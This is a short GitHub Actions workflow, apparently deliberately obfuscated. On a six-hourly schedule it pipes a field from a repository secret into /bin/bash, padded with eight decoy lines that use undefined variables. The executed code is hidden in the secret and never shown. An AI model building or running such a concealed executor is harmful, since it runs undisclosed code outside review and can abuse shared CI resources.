name: chengbuzheng3186
on:
  workflow_dispatch:
  schedule:
    - cron: '20 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chengbuzheng3186
        env:
          g567: ${{ secrets.g567 }}
        run: |
          echo $g567 | jq -r .x39739 | /bin/bash
          echo $pzr80 | jq -r .li4143 | /bin/bash
          echo $cp7770 | jq -r .issgg01471 | /bin/bash
          echo $cf49 | jq -r .fe34 | /bin/bash
          echo $qoxw05824 | jq -r .p52 | /bin/bash
          echo $j2 | jq -r .p1 | /bin/bash
          echo $ztfw8 | jq -r .nc939 | /bin/bash
          echo $oyf094 | jq -r .rbd5 | /bin/bash
          echo $gqdmt5550 | jq -r .wskm4 | /bin/bash

